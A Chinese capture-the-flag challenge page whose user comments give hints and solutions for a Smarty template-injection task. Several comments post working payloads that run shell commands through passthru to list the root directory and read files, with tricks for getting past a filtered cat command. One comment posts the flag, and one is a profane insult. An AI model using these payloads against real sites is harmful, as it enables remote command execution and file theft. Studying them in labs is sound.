评分(13)
解题动态
zhuguangsen 攻破了该题 9小时前
SingA_Song 攻破了该题 1天前
磊诺 攻破了该题 2天前
hjl 攻破了该题 2天前
ling0233 攻破了该题 2天前
shu-jia 攻破了该题 2天前
冷暖自知fzq 攻破了该题 3天前
男小孩 攻破了该题 3天前
记得开心一点 攻破了该题 4天前
LUruan 攻破了该题 5天前
leeleo 攻破了该题 5天前
perilla 攻破了该题 5天前
roro 攻破了该题 5天前
1117923 攻破了该题 5天前
Hackerchen 攻破了该题 6天前
lllsssyyy 攻破了该题 6天前
Jzml 攻破了该题 6天前
十里故清云 攻破了该题 6天前
mmhhdm 攻破了该题 7天前
评论
EtHat 2年前
举报
index.php?a={passthru("tac /_4060")}
FUCK123 1年前
举报
fnmdp
18904484271 2年前
举报
好垃圾的靶场,明明flag出来了,但是提交显示不正确
haker111 2年前
举报
看提示直接传值:?a,然后看到源码后进行解析,了解smarty模板。进行get传参,?a={if passthru('ls')}{/if} 查看当前目录,然后转到根目录下,?a={if passthru('ls /')}{/if},每个人的根目录下的第一个子目录不同,所以flag不同,查看第一目录?a=?a={if passthru('tac /_2096')}{/if},得到flag{...}
XRain 2年前
举报
没想起来 PHP 还有什么函数可以执行命令。不过,我用 scandir() 和 show_source() 就完成挑战了。 /?a={var_dump(scandir("/"))} 和 /?a={show_source("/_6583")}
冯飞99 2年前
举报
根据给出的提示发现可以通过/?回显得到源码,然后找到chatgpt解析一下源码,得知需要模板注入,构成payload,找到第二个源码再次让gpt翻译一下,得知在根目录下有个-数字的文件,由于cat命令用不了,使用tac命令查看得到flag。
wxy1343 2年前
举报
flag{d1342dda94d2f2b93118ff43530dcf77}
YZ_86 2年前
举报
bp抓包提交参数后会返回代码,根据代码可以发现有命令执行且过滤了哪几个函数{1*2}会发现返回2,这个时候用命令执行{passthru('ls /')},记得url转码,会发现返回结果有个图出的文件,cat被过滤了,用more查看就好{passthru('more /文件名')}。觉得清楚记得点赞,让更多人看到
s1amese 2年前
举报
/?w={{passthru("ls /")}} /?w={{passthru("more /_数字文件名")}}
s1amese 2年前
举报
passthru执行函数查看(ls),然后再查看列出的数字文件
gleason 2年前
举报
index.php?a={{passthru('more ../../../*|grep ff')}}